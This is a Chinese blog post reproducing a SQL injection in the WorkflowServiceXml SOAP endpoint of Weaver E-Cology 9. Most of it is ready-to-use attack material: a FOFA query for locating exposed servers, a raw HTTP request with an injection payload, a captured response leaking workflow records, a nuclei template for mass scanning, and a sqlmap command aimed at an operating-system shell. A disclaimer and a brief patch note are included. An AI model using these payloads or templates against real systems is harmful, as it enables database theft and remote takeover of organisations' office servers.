长亭百川云 - 文章详情

QVD-2024-26136 漏洞复现 poc (大范围)

fgz

125

2024-07-17

免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

01

漏洞名称

泛微E-Cology WorkflowServiceXml SQL注入漏洞

02

漏洞影响

泛微e-cology9 < 10.64.1

03

漏洞描述

泛微E-Cology 是一款协同管理平台,旨在为中大型组织创建全新的高效协同办公环境。身份认证、电子签名、电子签章、数据存证让合同全程数字化。包含流程、门户、知识、人事、沟通、客户、项目、财务等 20多个功能模块。该系统WorkflowServiceXml接口处未对用户输入进行有效过滤,直接将其拼接进了SQL语句中,导致SQL注入漏洞,会导致数据泄露。

04

FOFA搜索语句

app="泛微-OA(e-cology)"

05

漏洞复现

POC数据包,其中payload是1=1 AND 2=2

POST /services/WorkflowServiceXml HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Length: 422
Connection: close
Content-Type: text/xml
Accept-Encoding: gzip
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver">
<soapenv:Header/>
<soapenv:Body>
<web:getHendledWorkflowRequestList>
<web:in0>1</web:in0>
<web:in1>1</web:in1>
<web:in2>1</web:in2>
<web:in3>1</web:in3>
<web:in4>
<web:string>1=1 AND 2=2</web:string>
</web:in4>
</web:getHendledWorkflowRequestList>
</soapenv:Body>
</soapenv:Envelope>

响应内容如下

HTTP/1.1 200 OK
Connection: close
Transfer-Encoding: chunked
Cache-Control: private
Content-Type: text/xml; charset=UTF-8
Date: Wed, 17 Jul 2024 02:13:44 GMT
Server: WVS
Set-Cookie: ecology_JSessionid=aaaoDEbNHDKy05HlKOa8y; path=/
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><soap:Body><ns1:getHendledWorkflowRequestListResponse xmlns:ns1="http://webservices.workflow.weaver"><ns1:out><ns1:string>&lt;WorkflowRequestInfo&gt;
  &lt;requestId&gt;106746&lt;/requestId&gt;
  &lt;requestName&gt;~`~`7 会议取消`~`8 The meeting is canceled`~`~:-~`~`7 系统管理员`~`8 system administrator`~`9 系統管理員`~`~-2023-11-15&lt;/requestName&gt;
  &lt;requestLevel&gt;0&lt;/requestLevel&gt;
  &lt;workflowBaseInfo&gt;
    &lt;workflowId&gt;1&lt;/workflowId&gt;
    &lt;workflowName&gt;~`~`7 系统提醒工作流`~`8 System alert workflow`~`9 系統提醒工作流`~`~&lt;/workflowName&gt;
    &lt;workflowTypeId&gt;&lt;/workflowTypeId&gt;
    &lt;workflowTypeName&gt;&lt;/workflowTypeName&gt;
  &lt;/workflowBaseInfo&gt;
  &lt;currentNodeName&gt;~`~`7 提醒`~`8 remind`~`9 提醒`~`~&lt;/currentNodeName&gt;
  &lt;currentNodeId&gt;2&lt;/currentNodeId&gt;
  &lt;status&gt;~`~`7 提醒`~`8 remind`~`9 提醒`~`~&lt;/status&gt;
  &lt;creatorId&gt;1&lt;/creatorId&gt;
  &lt;creatorName&gt;~`~`7 系统管理员`~`8 system administrator`~`9 系統管理員`~`~&lt;/creatorName&gt;
  &lt;createTime&gt;2023-11-15 09:48:27&lt;/createTime&gt;
  &lt;lastOperatorName&gt;~`~`7 系统管理员`~`8 system administrator`~`9 系統管理員`~`~&lt;/lastOperatorName&gt;
  &lt;lastOperateTime&gt;2023-11-15 09:48:27&lt;/lastOperateTime&gt;
  &lt;receiveTime&gt;2023-11-15 09:48:27&lt;/receiveTime&gt;
  &lt;canView&gt;false&lt;/canView&gt;
  &lt;canEdit&gt;false&lt;/canEdit&gt;
  &lt;mustInputRemark&gt;false&lt;/mustInputRemark&gt;
  &lt;needAffirmance&gt;false&lt;/needAffirmance&gt;
&lt;/WorkflowRequestInfo&gt;</ns1:string></ns1:out></ns1:getHendledWorkflowRequestListResponse></soap:Body></soap:Envelope>

漏洞复现成功

06

nuclei poc

poc文件内容如下

id: QVD-2024-26136
info:
  name: 泛微E-Cology WorkflowServiceXml SQL注入漏洞
  author: fgz
  severity: high
  description: 泛微E-Cology 是一款协同管理平台,旨在为中大型组织创建全新的高效协同办公环境。身份认证、电子签名、电子签章、数据存证让合同全程数字化。包含流程、门户、知识、人事、沟通、客户、项目、财务等 20多个功能模块。该系统WorkflowServiceXml接口处未对用户输入进行有效过滤,直接将其拼接进了SQL语句中,导致SQL注入漏洞,会导致数据泄露。
  metadata:
    max-request: 1
    fofa-query: app="泛微-OA(e-cology)"
    verified: true
requests:
  - raw:
      - |+
        POST /services/WorkflowServiceXml HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
        Content-Type: text/xml
        Connection: close
        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservices.workflow.weaver">
        <soapenv:Header/>
        <soapenv:Body>
        <web:getHendledWorkflowRequestList>
        <web:in0>1</web:in0>
        <web:in1>1</web:in1>
        <web:in2>1</web:in2>
        <web:in3>1</web:in3>
        <web:in4>
        <web:string>1=1 AND 2=2</web:string>
        </web:in4>
        </web:getHendledWorkflowRequestList>
        </soapenv:Body>
        </soapenv:Envelope>
    matchers:
      - type: dsl
        dsl:
          - "status_code == 200 && contains(body, 'system') && contains(body, 'administrator') && contains(body, '提醒')"

07

sqlmap

将上述POC数据包写入1.txt

执行

python sqlmap.py -r 1.txt  --os-shell

08

修复建议

升级到最新版本。

或者下载官方补丁修复漏洞

https://www.weaver.com.cn/cs/securityDownload.html#

~~~少侠点个赞再走~~~

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2